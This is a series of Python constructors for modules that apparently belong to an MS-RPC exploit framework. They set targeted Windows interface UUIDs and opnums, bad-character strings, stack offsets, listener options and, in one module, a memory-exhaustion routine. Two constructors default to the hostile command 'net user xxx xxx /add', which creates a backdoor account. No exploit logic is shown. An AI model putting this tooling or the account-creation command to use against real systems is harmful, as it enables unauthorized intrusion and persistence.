def __init__(self):
    """Set the defaults for this print-spooler RPC module.

    Runs the msrpcexploit base constructor first, then fills in the
    interface, transport and bookkeeping attributes. The final state is
    exactly what the original one-line constructor produced.
    """
    msrpcexploit.__init__(self)
    self.name = NAME

    # Target and credentials start empty; presumably filled in by the
    # caller before a run -- confirm against the argument handling code.
    self.host = ""
    self.user = ""
    self.password = ""

    self.knowledgestring = "PrintProviders"

    # RPC interface UUID/version, reached over the \spoolss named pipe.
    self.UUID = "12345678-1234-abcd-ef00-0123456789ab"
    self.uuidversion = "1.0"
    self.namedpipe = "\\spoolss"

    # parseResponse is bound to this class's own parse_packet method.
    self.response = 1
    self.parseResponse = self.parse_packet
    self.autoversion = True  # always true, essentially :>
    self.buildConnectionList = self.buildTCPConnectionList
    self.port = 445  # SMB over TCP (microsoft-ds)
    self.needsNoShellcode = True
    self.targetfunction = 0
    self.getcontexthandle = self.get_pp_size

    # Here's where we set the size to be something larger than zero
    # when we're doing it for real.
    self.datasize = 0
    self.sleeptime = 0
    self.nouniresult = []
def __init__(self):
    """Initialise module state on top of the msrpcexploit base constructor."""
    msrpcexploit.__init__(self)
    self.name = NAME
    self.version = 0

    # A single NUL byte. Presumably the bytes the framework must keep out
    # of generated data -- confirm in msrpcexploit.
    self.badstring = '\0'
    self.subesp = 2000

    # No DCE object yet; presumably assigned once a connection exists.
    self.myDCE = None
def __init__(self):
    """Configure defaults for a module that calls spoolss EnumPrintersW.

    Only attributes are set here; no network activity happens in the
    visible code.
    """
    msrpcexploit.__init__(self)
    self.version = 0
    self.badstring = "\x00"  # NUL only

    # RPC interface identifier and version bound by this module.
    self.UUID = u"12345678-1234-abcd-ef00-0123456789ab"
    self.uuidversion = u"1.0"
    self.targetfunction = 0  # EnumPrintersW

    self.name = NAME
def __init__(self):
    """Populate the RPC interface defaults after the base constructor runs."""
    msrpcexploit.__init__(self)
    self.version = 0

    # NUL plus the path-like characters backslash, slash, dot, colon and
    # dollar. Presumably bytes to keep out of generated data -- confirm.
    self.badstring = "\x00\\/.:$"

    self.UUID = u"20610036-fa22-11cf-9823-00a0c911e5df"
    self.uuidversion = u"1.0"
    self.targetfunction = 0xc  # opnum 12 on the interface above

    self.name = NAME
def __init__(self):
    """Set defaults for a spoolss EnumPrintersW module.

    The explicit trailing ``return`` of the original is dropped; the
    method still returns None.
    """
    msrpcexploit.__init__(self)
    self.version = 0
    self.badstring = '\x00\xff'  # NUL and 0xFF

    self.UUID = '12345678-1234-abcd-ef00-0123456789ab'
    self.uuidversion = '1.0'
    self.targetfunction = 0  # EnumPrintersW

    self.name = NAME
def __init__(self):
    """Register the module name and description, then set RPC defaults."""
    msrpcexploit.__init__(self)
    self.name = NAME
    # setInfo is called right after the name is set, as in the original.
    self.setInfo(DESCRIPTION)

    self.version = 0
    self.badstring = '\0'  # NUL only

    self.UUID = u'dc246bf0-7a7a-11ce-9f88-00805fe43838'
    self.uuidversion = u'1.0'
    self.targetfunction = 1
def __init__(self):
    """Initialise defaults for an interface at version 5.0.

    Automatic version detection is switched off here (autoversion = 0).
    """
    msrpcexploit.__init__(self)
    self.name = NAME

    self.UUID = u'50abc2a4-574d-40b3-9d66-ee4fd5fba076'
    self.uuidversion = u'5.0'
    self.targetfunction = 1

    self.autoversion = 0
    self.subesp = 2000

    # listenerArgsDict is not created here; presumably it comes from the
    # base constructor -- confirm in msrpcexploit.
    self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self):
    """Set defaults for a module that calls spoolss EnumPrinterDriversW."""
    msrpcexploit.__init__(self)
    self.version = 0
    self.badstring = '\0'  # NUL only

    self.UUID = u'12345678-1234-abcd-ef00-0123456789ab'
    self.uuidversion = u'1.0'
    self.targetfunction = 0xa  # EnumPrinterDriversW

    self.name = NAME
    self.subesp = 1000

    # listenerArgsDict is presumably provided by the base constructor.
    self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self):
    """Initialise defaults for a service reached directly on TCP 3628."""
    msrpcexploit.__init__(self)
    self.version = 0
    self.badstring = '\0'  # NUL only

    self.UUID = u'25288888-bd5b-11d1-9d53-0080c83a5c2c'
    self.uuidversion = u'1.0'
    self.targetfunction = 0

    self.name = NAME
    # Not one of the standard SMB/RPC ports; presumably the port the
    # affected product listens on -- confirm with the module description.
    self.port = 3628

    self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self):
    """Set defaults for a module that talks over the ``browser`` named pipe.

    No uuidversion is assigned in this constructor, so whatever the base
    constructor leaves in place applies.
    """
    msrpcexploit.__init__(self)
    self.name = NAME

    self.port = 139  # NetBIOS session service
    self.host = ''

    self.version = 0
    self.badstring = ''  # no bad chars

    self.UUID = u'8d9f4e40-a03d-11ce-8f69-08003e30051b'
    self.namedpipe = u'browser'

    self.autoversion = 1
    self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self):
    """Set defaults for a spoolss EnumPrintersW module.

    Unlike most sibling constructors, this one explicitly forces
    'fromcreatethread' to 0 and uses a subesp of 0.
    """
    msrpcexploit.__init__(self)
    self.version = 0
    self.badstring = '\0\xff'  # NUL and 0xFF

    self.UUID = '12345678-1234-abcd-ef00-0123456789ab'
    self.uuidversion = '1.0'
    self.targetfunction = 0x0  # EnumPrintersW

    self.name = NAME
    self.subesp = 0
    self.listenerArgsDict['fromcreatethread'] = 0  # force it to 0
def __init__(self):
    """Initialise defaults for a module targeting NwrOpenEnumNdsSubTrees_Any."""
    msrpcexploit.__init__(self)
    self.name = NAME
    self.version = 0
    self.badstring = '\0\xff'  # NUL and 0xFF

    self.UUID = u'e67ab081-9844-3521-9d32-834f038001c0'
    self.uuidversion = u'1.0'
    self.targetfunction = 9  # NwrOpenEnumNdsSubTrees_Any

    self.autoversion = 1
    self.subesp = 3000
    self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self):
    """Set defaults for a command-style module that needs no shellcode."""
    msrpcexploit.__init__(self)
    self.name = NAME

    self.UUID = u'ed6ee250-e0d1-11cf-925a-00aa00c006c1'
    self.uuidversion = u'1.1'
    self.targetfunction = 1

    self.autoversion = 1
    self.subesp = 2000
    self.port = 0

    # Default command string with placeholder values: on Windows it adds
    # a local account named "xxx". How it is delivered is not visible
    # here. For defenders, local account creation is recorded as
    # Security event 4720 when account-management auditing is enabled.
    self.command = 'net user xxx xxx /add'
    self.needsNoShellcode = 1
def __init__(self):
    """Initialise defaults for a module that connects on TCP 135."""
    msrpcexploit.__init__(self)
    self.name = NAME

    self.port = 135  # RPC endpoint mapper
    self.host = ''

    self.version = 0
    self.badstring = '\x00\xff'  # NUL and 0xFF

    self.UUID = u'4d9f4ab8-7d1c-11cf-861e-0020af6e7c57'
    self.uuidversion = u'0.0'
    self.targetfunction = 0

    self.listenerArgsDict['fromcreatethread'] = 1
    self.autoversion = 1
def __init__(self):
    """Set defaults for an interface at version 1.2 reached on TCP 139."""
    msrpcexploit.__init__(self)
    self.name = NAME

    self.port = 139  # NetBIOS session service
    self.host = ''

    self.version = 0
    self.badstring = '\x00\xff'  # NUL and 0xFF

    self.UUID = u'2f5f3220-c126-1076-b549-074d078619da'
    self.uuidversion = u'1.2'
    self.targetfunction = 0xc  # opnum 12

    self.autoversion = 1
    self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self):
    """Initialise defaults; the target function is left at -1.

    NOTE(review): -1 is not a valid opnum, so the real value is
    presumably chosen later (for example per detected version) --
    confirm against the rest of the class.
    """
    msrpcexploit.__init__(self)
    self.name = NAME

    self.port = 139  # NetBIOS session service
    self.host = ''

    self.version = 0
    self.badstring = '\x00'  # NUL only

    self.UUID = u'6bffd098-a112-3610-9833-46c3f87e345a'
    self.uuidversion = u'1.0'
    self.targetfunction = -1

    self.listenerArgsDict['fromcreatethread'] = 1
    self.autoversion = 1
    self.subesp = 2000
def __init__(self):
    """Set defaults for a module that uses the ``locator`` named pipe."""
    msrpcexploit.__init__(self)
    self.name = NAME

    self.port = 139  # NetBIOS session service
    self.host = ''

    self.version = 0
    self.badstring = '\x00\xff'  # NUL and 0xFF

    self.UUID = u'd3fbb514-0e3b-11cb-8fad-08002b1d29c3'
    self.uuidversion = u'1.0'
    self.targetfunction = 0
    self.namedpipe = 'locator'

    self.autoversion = 1
    self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self):
    """Initialise defaults for a module built around NetrJoinDomain2.

    The domain and controller names are placeholder defaults. The
    fake-DC path is off by default (usefakedc = 0).
    """
    msrpcexploit.__init__(self)
    self.version = 0
    self.badstring = '\x00\xff'  # NUL and 0xFF

    self.UUID = u'6bffd098-a112-3610-9833-46c3f87e345a'
    self.uuidversion = u'1.0'
    self.targetfunction = 22  # NetrJoinDomain2

    self.name = NAME

    # Placeholder domain / domain-controller names.
    self.domain = 'FOOBAR'
    self.controller = 'DC-1'
    self.usefakedc = 0
    self.timeout = 10.0  # ten second timeout for the fake NBNS server

    self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self):
    """Set defaults for a command-style module that needs no shellcode.

    The 'fromcreatethread' listener argument is deliberately not set
    here; the original keeps that assignment commented out.
    """
    msrpcexploit.__init__(self)
    self.name = NAME

    self.UUID = 'ed6ee250-e0d1-11cf-925a-00aa00c006c1'
    self.uuidversion = '1.1'
    self.targetfunction = 1

    self.autoversion = 1
    #self.listenerArgsDict['fromcreatethread']=1
    self.subesp = 2000
    self.port = 0

    # Default command string with placeholder values: on Windows it adds
    # a local account named "xxx". How it is delivered is not visible
    # here. For defenders, local account creation is recorded as
    # Security event 4720 when account-management auditing is enabled.
    self.command = 'net user xxx xxx /add'
    self.needsNoShellcode = 1
def __init__(self):
    """Initialise defaults for an interface at version 0.0 on TCP 139."""
    msrpcexploit.__init__(self)
    self.name = NAME

    self.port = 139  # NetBIOS session service
    self.host = ''

    self.version = 0
    # NUL, 0xFF and the path-like characters backslash, slash, dot,
    # colon and dollar.
    self.badstring = '\x00\xff\\/.:$'

    self.UUID = u'3919286a-b10c-11d0-9ba8-00c04fd92ef5'
    self.uuidversion = u'0.0'
    self.targetfunction = 0x9

    self.autoversion = 1
    self.subesp = 3000
    self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self):
    """Set defaults and rebind ``run`` to the memory-exhaustion routine.

    Judging by the method name this module is a resource-exhaustion
    (availability) test rather than a code-execution one; that matches
    needsNoShellcode = 1, but confirm against run_exhaust_memory.
    """
    msrpcexploit.__init__(self)
    self.name = NAME
    self.version = 0
    # NUL plus backslash, slash, dot, colon and dollar.
    self.badstring = "\x00\\/.:$"

    self.UUID = u"a4f1db00-ca47-1067-b31e-00dd010662da"
    self.uuidversion = u"1.0"
    self.targetfunction = 5

    self.autoversion = 1
    # NOTE(review): version was set to 0 above and is overwritten here,
    # so the effective value is 1. Both assignments are kept as found.
    self.version = 1
    self.sleeptime = 1

    self.buildConnectionList = self.buildTCPConnectionList
    # Instance-level override: calls to self.run() now dispatch to
    # run_exhaust_memory.
    self.run = self.run_exhaust_memory
    self.needsNoShellcode = 1
def __init__(self):
    """Initialise defaults for an interface at version 3.0 on the browser pipe."""
    msrpcexploit.__init__(self)
    self.name = NAME
    self.version = 0

    # Two separate byte sets are kept. How searchbadstring differs in
    # use from badstring is not visible here -- confirm in the class.
    self.badstring = '\0\xff'
    self.searchbadstring = '\0'

    self.UUID = u'4b324fc8-1670-01d3-1278-5a47bf6ee188'
    self.uuidversion = u'3.0'
    self.targetfunction = 0x1f  # opnum 31

    self.autoversion = 1
    self.subesp = 3000
    self.sleeptime = 4

    self.namedpipe = '\\browser'
    self.buildConnectionList = self.buildTCPConnectionList
def __init__(self):
    """Set defaults for a module that uses the wkssvc pipe on TCP 445."""
    msrpcexploit.__init__(self)
    self.name = NAME
    self.version = 0

    self.badstring = '\0\xff'  # NUL and 0xFF
    self.searchbadstring = '\0'

    self.UUID = u'6bffd098-a112-3610-9833-46c3f87e345a'
    self.uuidversion = u'1.0'
    self.targetfunction = 0x14  # opnum 20

    self.autoversion = 1
    self.sleeptime = 4

    self.port = 445  # SMB over TCP (microsoft-ds)
    self.namedpipe = '\\wkssvc'
    self.buildConnectionList = self.buildTCPConnectionList
    self.needsNoShellcode = 1
def __init__(self):
    """Initialise defaults for an authenticated module using several hooks.

    Several base-class hooks are pointed at methods of this class:
    startservice, getcontexthandle and runlocalhost. forceauth is set
    to 1 and the RPC object UUID is set to the interface UUID.
    """
    msrpcexploit.__init__(self)
    self.version = 0
    # NUL plus backslash, slash, dot, colon and dollar.
    self.badstring = "\x00\\/.:$"

    self.UUID = u"2f5f6520-ca46-1067-b319-00dd010662da"
    self.uuidversion = u"1.0"
    self.targetfunction = 0x1

    self.name = NAME

    # Hook bindings; the bound methods are defined outside this view.
    self.startservice = self.StartTapiSrvService
    self.getcontexthandle = self.getContextHandle

    self.port = 445  # SMB over TCP (microsoft-ds)
    self.forceauth = 1
    self.object = self.UUID  # must stay after the UUID assignment above
    self.context = ""
    self.runlocalhost = self.mylocalhost
    self.autoversion = 1  # we can now
def __init__(self):
    """Set defaults, including hard-coded private addresses for both ends.

    NOTE(review): host and localhost default to fixed RFC 1918
    addresses rather than empty strings. They look like leftover lab
    values and are presumably overridden by the caller -- confirm. A
    default that silently points at a real host is easy to run by
    mistake.
    """
    msrpcexploit.__init__(self)
    self.name = NAME
    self.covertness = 0
    self.port = 0

    # Hard-coded lab-style defaults (see the NOTE in the docstring).
    self.host = "192.168.0.6"
    self.localhost = "192.168.0.2"
    self.localport = 5555

    self.version = 0
    # The trailing comment looks like remnants of a longer exclusion
    # list. Only NUL and backslash are active.
    self.badstring = "\x00\\"  #/.:$"# \\/.:$"

    self.UUID = u"8d9f4e40-a03d-11ce-8f69-08003e30051b"
    self.uuidversion = u"1.0"
    self.targetfunction = 10

    self.autoversion = 1
    self.response = 1
    self.memorysize = 0x00f0ff10
    self.sleeptime = 10
def __init__(self):
    """Set defaults, then let setSubVersions() derive per-version values.

    setSubVersions() stays last so that it sees every attribute
    assigned above it, exactly as in the original.
    """
    msrpcexploit.__init__(self)
    self.name = NAME
    self.version = 0

    self.badstring = '\0\xff'  # NUL and 0xFF
    self.searchbadstring = '\0'

    self.UUID = '4b324fc8-1670-01d3-1278-5a47bf6ee188'
    self.uuidversion = '3.0'
    self.targetfunction = 0x1f  # opnum 31

    self.autoversion = 1
    self.subesp = 1000
    self.sleeptime = 4

    self.port = 445  # SMB over TCP (microsoft-ds)
    self.namedpipe = '\\browser'
    self.buildConnectionList = self.buildTCPConnectionList

    # Automatically sets some variables for some common versions/languages.
    self.setSubVersions()
def __init__(self):
    """Initialise defaults for a module bound to the RPC management interface.

    No shellcode is needed (needsNoShellcode = 1) and a response is
    requested (response = 1), which suggests an information-gathering
    module -- confirm against the run method.
    """
    msrpcexploit.__init__(self)

    # The port and host go through the base-class setters here.
    self.setPort(135)  # RPC endpoint mapper
    self.setHost("")

    self.name = NAME
    self.version = 0

    # MGMT UUID
    self.UUID = "afa8bd80-7d8a-11c9-bef4-08002b102989"
    self.uuidversion = "1.0"
    self.targetfunction = 0

    self.response = 1
    self.needsNoShellcode = 1  # we don't need shellcode here
    self.autoversion = 1
    self.namedpipe = "\\browser"

    # Kept in its original position, after the name and interface are set.
    self.loadDocumentationFile()
    self.sleeptime = 0